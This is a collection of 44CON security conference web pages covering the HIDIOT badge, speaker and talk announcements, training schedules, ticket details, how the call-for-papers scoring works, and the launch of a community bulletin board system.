          Don’t forget to mark your diaries for next year, 44CON 2017 will be taking place on the 13th-15th September. We hope to see many of you there.

          Getting Started With Your HIDIOT Badge

          Warning: Unlike most software, hardware can permanently damage machines. While every effort has been made to ensure that the 44CON badge will not kill your computer, remember that you built it yourself. Consider using a USB Hub when connecting the HIDIOT. Electrical faults are more likely to kill the hub than your computer. 44CON and Sense/Net Ltd accept no responsibility, both in general and specifically to the use and abuse of your HIDIOT and any damage caused therein.

          Thanks to Akos Rajtmar for the HIDIOT assembly video above

          If you came to 44CON 2016, then congratulations, you are one of about 500 people who have a HIDIOT 0.7 board.

          If you took part in the badge soldering workshop, then congratulations, you are one of <150 people who have a fully functioning HIDIOT 0.7 board.

          But what is a HIDIOT 0.7? And how do you make it do something other than blink? Continue reading “Getting Started With Your HIDIOT Badge”

          What to expect at 44CON

          If you haven’t been to 44CON before then you are in for a treat! We have 2 and a half jam packed days of awesome talks, workshops & networking… don’t believe us?… see for yourself. Oh, and yes, the big red bus is back this year with the bar being sponsored by Amazon! So make sure you stop by to say hello and grab a drink.

          44CON kicks off with a FREE community evening tomorrow night, from 6:30pm (Wednesday 14th, registration from 6pm). If you can’t make it to the full event but still want to be part of 44CON, the community evening is the perfect opportunity. If you have purchased your ticket for 44CON, it includes entry to Wednesday evening, all you need to do is turn up. If you can only attend the Wednesday evening then you will need to register here.

          Following on from our community night we have two full days of talks and workshops including Pen Test Partners IOT Workshop presented by Ken Munro (psst they will have beer!):

          Live car hacking – come and have a go at the Mitsubishi Outlander and see if you can find new vulnerabilities with their guidance. IoT hacking tuition is hands on – they will have a large quantity of IoT devices, testing equipment and a number of their team there to help you with extracting firmware.

          This year’s list of IoT junk stuff includes:

          • Various smart thermostats, some of which have 0-days, others are untested
          • Even more smart talking toys, just waiting to be made sweary
          • More home webcams than you can shake a stick at, ready to leak creds
          • And more wi-fi kettles, ovens and coffee machines…

          Ken is a regular speaker at the ISSA Dragon’s Den, (ISC)2 Chapter events and CREST events, where he sits on the board. He’s also an Executive Member of the Internet of Things Security Forum and spoke out on IoT security design flaws at the forum’s inaugural event. He’s also not averse to getting deeply techie either, regularly participating in hacking challenges and demos at Black Hat, 44CON, DefCon and Bsides amongst others.

          Ken and his team at Pen Test Partners have hacked everything from keyless cars and a range of IoT devices, from wearable tech to children’s toys and smart home control systems. This has gained him notoriety among the national press, leading to regular appearances on BBC TV and BBC News online as well as the broadsheet press. He’s also a regular contributor to industry magazines, penning articles for the legal, security, insurance, oil and gas, and manufacturing press.

          Read Ken’s blog here.

          Tickets are expected to sell out, so get yours while you can.

          See you at the ILEC!

          Jerry Gamblin: Frictionless Security

          Over the last few weeks we have been announcing the line up for 44CON2016. 44CON kicks off this week but it’s not too late to get your tickets!

          Our final speaker announcement is Jerry Gamblin – Frictionless Security

          “Frictionless Security” is the process of building your security program into your company’s infrastructure stack so that it is automated, non-intrusive, and non-negotiable.  Over the last year as I have implemented this program I have written custom API calls, CHEF scripts, slack bots and more in order to make my security program as frictionless as possible.

          In this talk we will discuss:

          What went well.
          What went wrong. (Hint: A LOT)
          What we will do differently to improve.

          Jerry Gamblin’s passion for security was ignited in 1989 when he hacked Oregon Trail to give himself the highest score in history in the world on his 3rd grade teacher’s Apple IIe.

          As a (mostly) grown up security evangelist and analyst, he has been featured on numerous blogs, podcasts and has spoken at security conferences around the world on keeping companies secure.

          When he’s not helping companies be more secure, you can find him taking his son to swim lessons or learning how to solder.

          You can read his latest thoughts at jerrygamblin.com.

           

           

          Evan Booth: Jittery MacGyver: Lessons Learned from Building a Bionic Hand out of a Coffee Maker

          Over the next few weeks we’re going to announce the 44CON talks and workshops. Don’t forget to get your tickets!

          Our next announcement is Evan Booth – Jittery MacGyver: Lessons Learned from Building a Bionic Hand out of a Coffee Maker

          In May of 2015, it was estimated that a pod-based coffee maker could be found in nearly one in three American homes. Despite the continued popularity of these single-cup coffee conjurers at home as well as in the workplace, it has become clear that these devices are not impervious to mechanical and/or electrical failure. It was this intersection of extremely prevalent hardware and relatively short lifespan that prompted me to begin exploring the upper limits of what could be created by repurposing one of the most popular pod-based machines: the Keurig.

          In this session, we will walk through some real-world examples of “MacGyver”-style creative problem-solving, we’ll go hands on (yes, pun intended) with stuff made from repurposed Keurigs, and finally, I’ll reflect on lessons learned from looking for potential in things most people deem common and unremarkable.

          Evan Booth loves to build stuff out of other stuff. As an engineer for Skookum, a full service software development company in Charlotte, North Carolina, he works to solve a variety of business problems through the creative use of technology. As a human for Earth, he tends to break things for curiosity’s sake.

          Throughout 2013 and into 2014, in an effort to highlight hypocrisy and “security theater” brought about by the TSA, through a research project called “Terminal Cornucopia,” Evan created an arsenal ranging from simple, melee weapons to reloadable firearms to remotely-triggered incendiary suitcases—all solely comprised of items that anyone can purchase inside most airport terminals *after* the security checkpoint.

          Given the right ingredients, a big cardboard box can be a time machine, spaceship, minecart, or a telephone booth that only calls people named “Steve” who live in the future.

          Details of all of our talks, workshops and speakers are being announced daily. Don’t forget to book your tickets before they’re sold out!

          Ian Trump: Meaningful Measurement: It’s About Time We Got This Right

          Over the next few weeks we’re going to announce the 44CON talks and workshops. Don’t forget to get your tickets!

          Our next announcement is Ian Trump – Meaningful Measurement: It’s About Time We Got This Right

          That cyber-crime has driven the rise of malware during the last decade is not in doubt; how large that increase has been most certainly is. This measurement has, I would argue, been more speculative than evidential. The problem being that attempts to quantify malware usage are lacking any meaningful industry accepted standard when it comes to the metrics concerned.

          When the numbers put forward by vendors, industry bodies and the media all vary so widely (not just between those sectors but within them as well), is it any wonder that any serious attempt to establish the scale, the cost or the impact of such attacks is doomed to failure? The disconnect between the reporting of cyber-crime and the actual metrics that are most important for both businesses under attack and the industry that exists to mitigate them will remain until the difficulties of comparing oranges with apples become apparent.

          Attempting any such comparative exercise is fraught with peril and serves to highlight where we, as an industry, are getting our metrics wrong; the largely accepted cost per record breach metric is far too broad a brush to paint any kind of recognizable real world picture. When reporting and discussing the scale and impact of cyber-crime it is imperative that we move away from sensationalizing of one part of the story or consequence of the breach, that which will create the biggest search engine feeding frenzy. Who the criminals were is of less import than how they got in; compromise indicators are more valuable to other businesses than the financial cost to that particular victim.

          The measurement metric dial has, ultimately, moved too far towards attribution and needs to be reset to prevention and a business-based analysis of risk once more. That business-based analysis itself needs to be more realistic, so there also has to be a move away from the kind of threat intelligence reporting which is almost exclusively dominated by data derived from the large enterprise sector and consequently of little relevance to the Small and Medium Enterprise (SME) market.

          The data upon which threat intelligence and attack surface trend analysis resources are based must become more granular if it is to become more relevant across all business sectors. If we continue to go down the road of never disclosing or identifying the security components that failed or the components that were not in place when a breach happened, we will never make any progress against an elusive enemy.

          Ian Trump, CD, CPM, BA is an ITIL certified Information Technology (IT) consultant with 20 years of experience in IT security and information technology. As a project and operational resource, Ian has functioned as an IT business analyst, project coordinator and as a senior technical security resource as required. Ian’s broad experience on security integration projects, facilitating technological change and promoting security best practices have been embraced and endorsed by his industry peers.

          From 1989 to 1992, Ian served with the Canadian Forces (CF), Military Intelligence Branch; in 2002, he joined the CF Military Police Reserves and retired as a Public Affairs Officer in 2013. His previous contract was managing all IT projects for the Canadian Museum of Human Rights (CMHR). CMHR is the first museum solely dedicated to the evolution, celebration and future of human rights – it is the first national museum to be built in nearly half a century, and the first outside the National Capital Region.

          Currently, Ian is the Global Security Lead at LogicNow working across all lines of business to define, create and execute security solutions to promote a safe, secure Internet for Small & Medium Business world wide.

          Details of all of our talks, workshops and speakers are being announced daily. Don’t forget to book your tickets before they’re sold out!

          Azhar Desai & Nicholas Rohrbeck: Effortless, Agentless Breach Detection in the Enterprise: Token all the Things!

          Over the next few weeks we’re going to announce the 44CON talks and workshops. Don’t forget to get your tickets!

          Our next announcement is Azhar Desai & Nicholas Rohrbeck – Effortless, Agentless Breach Detection in the Enterprise: Token all the Things!

          Using honeytokens to detect breaches is an old idea that has been sporadically spoken about (and implemented less often). Despite recommendations from the occasional consultant, honeytokens have not been adopted as widely as they should have. This needed to change. In 2015, we released Canarytokens (http://canarytokens.org) to bring about wider use of tokens.

          Canarytokens natively supports web bugs, DNS tripwires, SQL row tokens, document tokens and a handful of other friends. Via a simple web interface, several thousands of these tokens have been deployed worldwide (and a number of breaches have been reliably discovered). Considering that most tokens can be deployed in under 5 seconds, this was already pretty good ROI.

          This year, tokens go much further. From abusing native OS functionality to bending cloud infrastructure, this talk covers work done in our new quest to “token all the things”. We’ll show infrastructure we built for users to easily set tripwires around their network without installing agents, deploying hardware or spending a cent. Along with file format chicanery and old fashioned web-app-abuse, we will show new techniques (and defensive hacks) that you can use to detect breaches on your networks.

          Azhar writes and runs software with a security bent at Thinkst, an applied research company focusing on information security. He has, in the past, had fun presenting with others from Thinkst at conferences such as Troopers (2015) and HITB KL (2014).

          Nick is a software developer at Thinkst Applied Research. Before arriving at Thinkst, he was primarily a Java developer, but now his days are filled with Python, network security research, DevOps tinkering and (badly) playing Go.

          Details of all of our talks, workshops and speakers are being announced daily. Don’t forget to book your tickets before they’re sold out!

          Juan Perez-Etchegoyen & Nahuel Sanchez : Attacks on SAP HANA platform

          Over the next few weeks we’re going to announce the 44CON talks and workshops. Don’t forget to get your tickets!

          Our next announcement is Juan Perez-Etchegoyen & Nahuel Sanchez – Attacks on SAP HANA Platform

          Companies nowadays are choosing between on-premise, cloud and hybrid deployment models. The common factor across all of these scenarios is the underlying platform, used in the background to run all on-premise and cloud-based applications developed by SAP. This platform is called SAP HANA, which is an in-memory database integrated with an application server that provides a new paradigm for vulnerabilities and risks, serving an increasing number of business applications, providing cutting edge features and overwhelming performance.

          With the rise of IoT, many features and interfaces are integrated into SAP HANA and the HANA Cloud Platform, enabling it as a central point for IoT communications and making it an interesting target for anyone trying to access the information of several millions of devices across the world. Vulnerabilities affecting SAP HANA now have an increased attack surface, as these could be abused to compromise many diverse deployments and many customers, if the customers are not properly taking care of these risks.

          Join us for this presentation to learn about diverse attack vectors affecting current SAP solutions, on-premise and cloud-based. You will not only learn technical details about these vulnerabilities, but also understand how to prevent and detect attacks to our crown jewels, running on HANA.

           

          Juan Perez-Etchegoyen leads the Product teams that keep Onapsis on the cutting-edge of the business-critical application security market. He is responsible for the design, research and development of Onapsis’ innovative software solutions, and helps manage the development of new products as well as the SAP cyber-security research that has garnered critical acclaim for the Onapsis Research Labs. He is regularly invited to speak and host training at global industry conferences including Blackhat, HackInTheBox, Troopers, and SAP TechEd/DCODE. Prior to joining Onapsis, Juan led many Information Security consultancy projects for Companies in Latin America, EE.UU. and Europe. His strongest experience is in the field of Penetration Testing, Web Application Testing, Vulnerabilities Research, Information Security Auditing and Standards.

          Nahuel D. Sanchez is a security researcher at Onapsis. Being a member of Onapsis Research Labs, his work focuses on performing extensive research of SAP products and components, identifying and reporting security vulnerabilities, attack vectors and advanced exploitation techniques that are applicable to different platforms. Nahuel is one of the most frequent reporters of vulnerabilities in SAP products and is a frequent author of the publication “SAP Security In-Depth”. He previously worked as a security consultant, evaluating the security of Web applications and participating in Penetration Testing projects. His areas of interest include Web security, reverse engineering, and the security of Business-Critical applications.

          Details of all of our talks, workshops and speakers are being announced daily. Don’t forget to book your tickets before they’re sold out!

          #####EOF##### 44CON Training – 44CON

          44CON Training

          As well as around the main event, 44CON run training throughout the year on a quarterly schedule. This page will be updated as more courses are finalised. You can also follow our twitter account 44CON or sign up to our mailing list for announcements as they come out.

          Course attendance includes invitation to an event held during or next to the training dates. Sometimes this is a whole day. Sometimes an evening event.

          2019 Schedule

          June Training: 6th – 7th June 2019

          We have 3 training courses available in June, each two days in length. Training will take place at the Novotel London West in Hammersmith:

          Course attendees will be invited to an evening event, currently scheduled for the 6th of June.

          September Training: 9th – 11th September 2019

          Our call for training at 44CON 2019 has now closed. 2-Day courses will run on the 10th and 11th of September. 3-day courses will run 9th-11th September. Courses will be added to the list below as info comes in. Tickets will go on sale from April 1st.

          Training will take place at the Novotel London West in Hammersmith:

          More courses will be listed closer to the event. All course attendees are invited to a special pre-44CON evening event on the 10th of September.

          December Training: 2nd – 6th December 2019

          Our call for training is now closed. Courses will be listed in due course.

          Please contact us if you’d like to deliver training in London in March 2020.

          44CON have been running pre-conference training courses since we started in 2011. All training updates will be announced on our twitter page @44CON or you can sign up to our mailing list.

          #####EOF##### Dawid Czagan’s training course is still going ahead – 44CON

          Dawid Czagan’s training course is still going ahead

          Have you ever thought of hacking web applications for fun and profit? How about playing with authentic, award-winning security bugs identified in some of the greatest companies? If that sounds interesting, join Dawid Czagan’s training course, Hacking web applications – case studies of award-winning bugs in Google, Yahoo, Mozilla and more, on the 27th and 28th April 2016. It will take place at the ILEC Conference Centre.

          Do check it out!

          #####EOF##### Training course at 44CON Cyber Security 2016 – 44CON

          Training course at 44CON Cyber Security 2016

          Have you ever thought of hacking web applications for fun and profit? How about playing with authentic, award-winning security bugs identified in some of the greatest companies? If that sounds interesting, join Dawid Czagan’s training course, Hacking web applications – case studies of award-winning bugs in Google, Yahoo, Mozilla and more, which we will be running after 44CON Cyber Security 2016, on the 27th and 28th April 2016. It will hopefully take place at the same venue as the conference.

          Do check it out!

          #####EOF##### The 44CON CFP just closed. You won’t believe what happens next. – 44CON

          The 44CON CFP just closed. You won’t believe what happens next.

          Edit: This post was originally written just after the CFP closed in 2017. If you’re here from a CFP-related link, don’t assume this year’s CFP is closed. If you’re not sure, check the CFP system for the latest info.

          Each year 44CON attracts between 100-200 submissions. Some of these are excellent talks, some are average and some are, well, let’s just say that some are below average. In this blog post I’ll try to go through what happens when the CFP closes and to help you answer the immortal question, “Has my talk been accepted/rejected?”

          Along the way I’ll announce our first accepts, and most importantly explain the why of our CFP process.

          How our CFP works

          Our CFP uses the HotCRP system. There are 14 people on this year’s programme committee. In 2017 we had 146 complete submissions. Once the CFP closes we are unable to take further submissions. We’d love to, we really would. In our experience, this has led to people being upset in the past. This is one of the many reasons we can’t have nice things.

          At the time of writing voting is still ongoing. After closing there’s a two week voting window. In the third week we start processing accepts and hard rejects.

          We want each talk to get at least 5 votes. CFP programme committee members can still vote on talks with fewer than 5 votes in the third week.

          Scoring talks

          Talks are scored from 1 to 5. We use the mean average score to determine the final figure. Anything with fewer than 5 votes is treated slightly differently. I’ll come to that later.

          The lowest scoring talks are rejected more or less instantly from the third week on, unless they have fewer than 5 votes. Accepts go out for the 20 highest scoring submissions first. We work down the list as slots are filled.

          On average talks have to score over 4/5 to make the main tracks. That’s a very high standard and a lot of really good talks don’t make it. It’s frustrating to reject awesome talks but unfortunately we only have so many available slots.

          We have 18-20 main track talk slots in any given year, 4-8 workshop slots and an unconference track shared with workshop slots.

          Processing

          Accept and reject emails start to go out two weeks after the CFP closes. In 2017 this is from the 15th of June. We start with the lowest and highest scoring talks and work our way towards the middle.

          Accepts go out to the top 20 submissions first. We then work down the list until all slots are filled. Speakers have until the end of June to confirm and get the necessary information back for us to book their travel.

          If you haven’t received an email by mid-June don’t worry. Sometimes it means you’re close to being accepted, but others need to drop out or confirm first. If you’re on hold it doesn’t mean your submission isn’t appreciated. On the contrary, we appreciate it a lot and are trying to get you a slot. We aim to email you by June 19th if this is the case.

          Talks scoring lower than 3 are usually rejected immediately (with the exception of talks with fewer than 5 votes).

          Talks with few votes

          Once we’ve filled all slots we’ll close the CFP for the year. If a talk hasn’t had enough votes we’ll poke CFP committee members to vote. Talks with fewer than 5 votes won’t be rejected until they’ve either passed the 5 vote threshold or all slots have been filled.

          Backup speakers

          We have a small number of slots for backup speakers. We’ll try to find you a place and time to speak if you want to, but can’t guarantee it. We advise against challenging other speakers to combat for their slots as duelling has been illegal in the United Kingdom for some time.

          Obtaining feedback

          All speakers have the right to feedback. Just mail speaker ops when you get your rejection/accept email and we’ll take care of this. Steve handles feedback personally. As such it sometimes takes a while to obtain and collate feedback for everyone.

          Hopefully this should give you an insight into our process. If you have any questions or you haven’t heard from us (and have checked your spam folder), drop us an email and we’ll do our best.

          #####EOF##### 44CON

          Building an AWS and Azure security training platform

          This is a guest post by one of our trainers, Paul Schwarzenberger. Paul is running the fantastic Cloud Security and Devops training course this June. He also has a blog where he talks about AWS, Cloud Security and DevOps. This is part of a series on how he’s built a platform to make things easier for those attending his training. Thanks, Paul!

          Part 1 – Proof of Concept

          The Cloud Security and DevSecOps training course I’m delivering for 44CON in June includes AWS, Azure and GitHub accounts which the students use so they don’t need to create their own.

          Wouldn’t it be great if students could turn up with any laptop, or even an iPad, and do the course? And the time spent on the labs would be used to learn about cloud security and DevSecOps, not debugging software installation issues.

          Hacking 44CON’s Pricing Model (5 Different Ways)

          It seems like it was only two weeks ago when we announced the early bird tickets, but sadly all 50 have been snapped up. Still, being the great folks we are, we wanted to show you 5 different ways to hack the 44CON ticket pricing model because, well, basically we’re good guys like that. After all, we taught you how to game the 44CON CFP and that worked well. In the words of every security researcher everywhere, “What could possibly go wrong?”

          44CON 2019 Early-Bird Tickets are now on sale

          Our 2019 Early bird tickets are now on sale. There are 50 early bird tickets available until March 11th. Once they’re gone, they’re gone. As usual, the early-bird prices still start at £299 inc. VAT, but there are also accommodation and t-shirt options available.

          We’re trialling a small selection of cheap expo tickets providing limited event access with certain groups, and there will be pre-registered free evening event tickets. Early bird tickets are the cheapest fully catered, full access tickets you can get. If you want to see the talks, you want one of these.

          As well as full access to 44CON, Early bird ticket holders can also ask for an invite to our 44CONnect event in London on the 13th of March. This invite-only event will take place the day before CRESTCon, and will feature talks from some of the trainers taking part in our quarterly training programme. Please make sure you mention 44CONnect on your booking, or contact us after booking if you’d like to come.

          Book your tickets in our shop. If you’d like to book in bulk or through your employer, contact us to arrange an invoice.

          44CONnect – A 1-day invite-only event in March 2019

          44CONnect is a 1-day invite-only event taking place on the 13th of March, somewhere in London. The purpose of the day is to bring together people doing 44CON training, so they can connect with trainers and people on different courses. It’s our way of giving people who’ve attended our courses the chance to get a taste of upcoming training, and the opportunity to get some extra credit to take back to the office.

          To qualify for an invite, you need to have done one of the following:

          There are 20 tickets available, so make sure you qualify!

          Our trainers from the last two days of training will deliver talks, as well as some of those delivering courses later this year. All of our training course delegates are invited, for whom lunch will be included. Early bird ticket holders invited to the event will have to buy their own lunch, as we can’t book it for them in advance.

          There’ll be a special round of lightning talks for training delegates to deliver a short talk about something they learned on their course. Those speaking will get a small certificate of thanks that they can take back to the office.

          Drinks have been organised for the evening, but we need to be in bed early for CRESTCon the next day.

          *Early-bird ticket holders will be chosen at random throughout February, although unsubstantiated rumours abound that asking for an invite on your ticket order may drastically improve your chances…

          #####EOF##### 44CON CYBER SECURITY 2015 – 44CON

          44CON CYBER SECURITY 2015

          What is 44CON Cyber Security?

          Brand new for 2015, 44CON Cyber Security is an annual one day Information Security Conference and Exhibition that is taking place in London, on Tuesday 28th April 2015.

          44CON Cyber Security will be a full day event with workshops, talks, a new exhibition and plenty of networking – all delivered by people who do cyber security rather than just sell cyber security.

          44CON Cyber Security focuses on both the management and technical side of information security topics. With a respected panel of Program Committee members, we aim to bring the same fresh knowledge and 44CON awesomeness to the attendees.

           

          How do I register for 44CON Cyber Security?

          You can register now and there will be two types of tickets:

          The 44CON Cyber Security PREMIUM ticket (£100) will include:

          • A dedicated presentation track covering Information Security topics
          • Two dedicated workshop tracks that will have takeaways
          • Keynote addresses by respected industry experts
          • Exhibitor area
          • Networking opportunities
          • Networking Lunch
          • 44CON CS badge and lanyard
          • Refreshments

          The 44CON Cyber Security FREE ticket – WOAH did you say 44CON free – Yes, a FREE visitor ticket will include:

          • Access to the exhibition
          • 44CON CS badge and lanyard
          • Access to the 44CON CyberSec track
          • Networking opportunities
          • A lunch option (extra cost)

          Tickets for this event will be capped so you’ll have to get them quickly! – registration is now open here

           

          Where will the 44CON Cyber Security take place?

          44CON Cyber Security will take place at the ILEC Conference venue, Lillie Road, London on Tuesday 28th April 2015.

          How can I exhibit at or sponsor 44CON Cyber Security?

          Email the team at sponsorops@44con.com and we’ll send you some more information

          How can I become a 44CON Media Partner?

          Email the 44CON marketing team at marketing@44con.com and we can set up a call to discuss

          I am a member of the press, how can I register?

          Email the 44CON marketing team at marketing@44con.com and we can set up a call to discuss

          #####EOF##### ISSA -UK – 44CON

          ISSA-UK

          Welcome to ISSA-UK, the UK Chapter of the ISSA. With active participation from individuals and chapters all over the world, the Information Systems Security Association (ISSA) is the largest international, not-for-profit association specifically for information security professionals. Having welcomed over 1,800 members since our beginnings in 2003, the ISSA-UK Chapter is the world’s most successful chapter. At only $95 per year for membership, we offer the most value out of any security association globally.

          #####EOF##### 44CON 2017 – 44CON

          44CON 2017

          44CON 2017 will take place on 13th to 15th of September 2016 at the ILEC Conference Centre. It will kick off on Wednesday 13th September at 6:30pm with our Community Evening. Registration will start at 6pm.

          Entry is free on Wednesday evening but you will have to register beforehand.

          Early Bird Tickets for 44CON 2017 went very quickly. Standard tickets are available in our shop.

          Accommodation:

          Like we did last year, we are giving you the option to book a hotel room at the same time as your ticket, for 2 nights (Wednesday and Thursday) or 3 nights (Tuesday to Thursday or Wednesday to Friday, please specify at checkout), including breakfast and WiFi, for:

          • £110 per night for a single room (inc VAT)
          • £120 per night for a double or twin room (inc VAT)

          You can also book rooms at the same price directly with the IBIS by emailing h5623-re8@accor.com or calling +44 (0) 207 666 8551 and quoting the following code: 44CON17-ATT. There is a limited number of rooms available and the code will expire one month before the event so book early to avoid disappointment.

          #####EOF##### bbs – 44CON

          Building A Permanent Community At 44CON

          44CON’s always been the kind of place where you turn up, hang out with friends old and new, get your head bent then go home and get on with your life. But we want to do more than that. We’re building a permanent community for everyone, whether you come to 44CON or not. We’re also mostly old(er Steve, damnit! – A) and riddled with nostalgia. Instead of using Snapbook, or Slickchat or whatever the cool kids use, we thought we’d build a traditional Bulletin Board System and drag it kicking and screaming into the modern age.

          To say this was a bad idea was an understatement. Our first attempt used a hodge-podge of Docker, a piece of DOS-based software last updated before the average attendee was born and one instance of a DOS emulator per connection. It worked, but was telnet only (thanks to the joys of serial emulation) and was very, very unstable.

          In the end we settled on a modern BBS implementation that has a learning curve almost as steep as Radare2, but allows us to do cool modern things, like provide access over SSH and HTTPS. Originally we worked on supporting older platforms like the BBC Micro, C64 and ZX Spectrum, but everything old struggled with newer software, and everything new struggled with older software.

          Finally, we have something we think you’re going to love. Registration will open on the 12th of September. May we present the official 44CON rumour mill, Juicy HQ:

          For those of you who’ve never used a BBS before, the first thing you need to know is that you apply for an account (register). Once you’ve filled in a form, you’ll be taken to the new scan screen. This is to check for updates since you last logged on. There are public and private message areas, file uploads (check out our collection of classic British hacking textfiles, or our PoC||GTFO archive) and you can play multiplayer old-school BBS games courtesy of our DoorParty setup. If things seem a little less interactive, remember that BBSes were typically built to serve very few, if any concurrent users, and most content was downloaded in batches for later offline use.

          Most British people never really got to use dial-in BBSes back in the day due to BT’s monopoly and pricing, although Prestel and Micronet had some popularity. There was one information system that every British person had access to, which was Teletext. On the BBC, we had Ceefax. So we built our BBS around a Ceefax theme, although you might spot the odd reference to Teletext classics such as Bamboozle and even Digitiser. And yes, all of this is accessible in a web browser.

          Although Juicy HQ is the official 44CON BBS, it’ll be open to everyone from the 12th of September. Whether you’ve been to 44CON or not, live in the UK or not, or if you’ve never been to a conference before, all are welcome providing Wheaton’s law is followed at all times.

           

           

          We’re still refining Juicy HQ in preparation for launch, but we’re making sure there’s plenty of easter eggs for you to find. If you’re interested in beta testing the BBS, give Steve a shout on twitter or mastodon and he’ll hook you up.

          #####EOF##### 44CON – Page 2 – 44CON

          44CON 2018 CFP Is Open!

          We’re really excited to open our Call For Papers for 44CON 2018. We’re looking forward to seeing all of your submissions on our shiny new CFP system, which promises to be far less painful than the old one.

          44CON consists of 2 dedicated speaking tracks, a dedicated workshop track and combined speaking/workshop track over the two days. Talks range from softer subjects in areas such as governance, law and policy through to reverse engineering, exploitation, tooling and abuse of weird machines. We also have an open evening freely accessible to all (but with pre-registration) on the Wednesday evening before the main event.

          Talks are 45 minutes long, while workshops are 60-120 minutes in length. All submissions are welcome but some useful guidance on particular topics of interest can be found at the CFP submission system.

          As usual, speakers from outside of Fulham, Putney or London Underground Zone 1 will have travel reimbursed. We’ll provide two nights accommodation for speakers or workshop presenters with more than an hour’s travel to a mainline London rail station. We’ll bump that to 3 nights accommodation for any accepted speaker providing a talk and a workshop.

          If you’re interested in submitting something, we highly recommend reading last year’s How To Game The 44CON CFP blog post.

          The CFP closes on Monday 30th April 2018 at 23:59pm UTC. We’ll start notifying speakers by the 4th of June and announce our first round of accepted speakers on the 6th of June at BSides London. Full details of dates can be found on the CFP system.

          How to game the 44CON CFP

          Every year 44CON has a Call For Papers (CFP). The CFP is run by a panel of about 10 people from various parts of the industry, predominantly based in the UK. The process and technologies used have changed over the years, most notably last year when we replaced our existing bespoke CFP system with HotCRP and implemented a weighted average scoring mechanism based on HotCRP voting results.

          TL;DR – I want to speak at 44CON

          Ok, then do these things to boost your chances:

          1. Submit a workshop with your talk
          2. Make it clear where else you’ve submitted and/or might/will submit
          3. Include links to other talks you’ve done, video if you have it
          4. Get your talk in early for a better chance of scoring higher
          5. Be enthusiastic, tell us of any boundaries, problems or needs, and work with us, not against us

          Understanding how the CFP works

          The CFP is opened on a particular date for submissions. Everyone speaking in Track 1 or 2 must go through the CFP process. Track 3 (which is sometimes used for workshops) is a little more fluid, for reasons I’ll discuss later.

          Scoring and voting

          Scoring is as much an art as science, but you can improve your chances of speaking at 44CON.

          Our panel votes on and scores talks out of 5, normally in several tranches. It varies by individual and not everyone votes on every talk. People provide comments and feedback, which we pass onto those submitting on request. On average we get between 200-400 submissions a year.

          When the CFP is due to close, we push panel members along to review and score submissions, particularly if they haven’t yet been voted on.

          Once voting is complete, we divide the sum of scores from each voter by the number of voters to get an average, with an option for discussion under certain circumstances that can weight a score by up to + or – 0.5.

          UK submissions normally get up-voted (with some exceptions, see below), and in the selection rounds there’s a strong bias towards UK-based speakers over non-UK-based speakers with identical scores, unless the non-UK-based speaker’s talk is exceptional in other ways. This doesn’t mean that your talk will be rejected if you’re not based in or from the UK. Non-UK based speakers make up the majority of our speakers, but there is definitely a small “home bias” amongst the panel members based in the UK.

          Why does it take so long to find out if I’m accepted?

          If you’re not sure what’s happening, contact us and we’ll give you an update.

          Once we have the results we look to fill a specific number of slots, which varies each year. Acceptance messages are sent out in tranches, and when people return the speaker agreement, they’re confirmed. We normally send rejections for very low scoring talks, but there’s a glut of talks usually falling between 3.5-4.0, where they might be accepted if others scoring higher can’t make it.

          If you’ve scored an average of 5.0, you’re pretty much guaranteed a slot and we’ll get in touch straight away. The bulk of submissions tend to hover around a score of 3-4, and 4.5 is normally the cut-off point for the first tranche of accepts. We then wait till the first tranche come back, or if we get no response, chase them up twice before moving on.

          For the slots that free up, we move down the list, ensuring those who scored highest get picked first. Once we’ve filled up tracks 1 and 2, we move on to track 3.

          After the first round of talk triage, cut-off tends to happen around average scores of 4.25 – 4.0/5. What this means is that there are a lot of good talks that just don’t get accepted at 44CON because we don’t have the space to support them, even with a third track. More often than not a talk or workshop rejection from 44CON does not mean it sucks. Ask for feedback and we’ll share what we can.

          Wait, isn’t 44CON a two-track conference?

          All speakers dress like this when preparing submissions.

          Yes and no. For several years we’ve run a hidden track under various names. This is because we’ve wanted to give our backup speakers a chance to speak if someone drops out, but we don’t want to risk slots emptying on the main tracks. Inevitably people drop out along the way, people who are allocated to track 3 move onto the main tracks and this leaves gaps that we have the option to fill.

          Sometimes we’ll look back at the talks list and offer a spot to someone on it; at other times it’s easier to go to people we know are definitely coming and see if they have something. This is a completely arbitrary decision affecting two slots a year at most, and more often than not, 10-20 people want the slots. We generally operate on a first come, first served basis.

          Hacking the process

          Now you know how the process works, let’s look at how you can subvert it to ensure your talk has the best chance of scoring high. Each voter on the panel is different, but there are certain things that, on average, will result in you being more favourably considered.

          Submit both Talks and Workshops

          We have 2-3 tracks to fill with talks, and get on average 200-400 submissions a year. We get fewer than 20 workshop submissions a year. Workshops are 2 hours long and come with an extra night’s accommodation when talks are also submitted.

          If you want to maximise your chances of speaking at 44CON, submit a workshop.

          Workshops are typically more intimate affairs with room for about 30-50 people sitting down, although we have had workshops with 100 people. If you’re not sure what to do in a workshop, imagine your main talk is about the theory, then build a play-along walkthrough of how to do it in practice.

          Every year we’ve run a formal CFP process, we’ve treated people who submit workshops far more favourably than people who submit talks alone. Even if your workshop is unrelated to your talk, both are likely to be up-voted considerably.

          I cannot stress this enough. If you want to maximise your chances of speaking at 44CON, submit a workshop.

          This only works if you submit your workshop separately to your talk. People submitting a talk and workshop in one don’t get the voting benefit separate talk and workshop submissions do. Finally, if you’re only prepared to come if your talk is accepted, please say so on both submissions.

          Tell us where else your talk has been submitted

          44CON is usually among the first events in the calendar after BlackHat and DefCon. Everyone wants to speak in Vegas, we understand that. Some people score BlackHat and DefCon talks slightly lower in order to give preference to newer talks, some don’t. It’s down to the panel. If you don’t tell us you’re talking at BlackHat or Defcon, and we find out by checking the site, panel members will remember next year and it may affect future submissions.

          If you’re doing your reveal in Vegas, focus on your process at 44CON.

          Not everyone in the UK can go to BlackHat or Defcon, so it’s not a big problem if your talk is given in the UK afterwards. We do need to know what will be different. It takes a lot of effort to deliver a big Vegas talk, and making something different may seem like an awful lot of extra work, but there’s an easy workaround that normally gets big bounces.

          If you’re doing your reveal in Vegas, focus on your process at 44CON. If you spent 6 months trying to reverse engineer and compile code for an arcane architecture, we want to know how you went about it. We also appreciate failures as much as successes. Some of our better talks have been talks about how people have failed and what they learned.

          If your talk is 70% different to your Vegas talk, say so. If it’s 50%, say so. If it’s 30%, say so. If you say so, and it’s not, then reviewers will know next year.

          Show us your other talks

          A picture speaks a thousand words, but a video of your talk lets the panel look at the type of speaker you are, how you approach your talks, and gives us an idea of where we think you might fit in best.

          Show us your other talks, even if you're a rockstar.
          Showing us your other talks helps us fit you in.

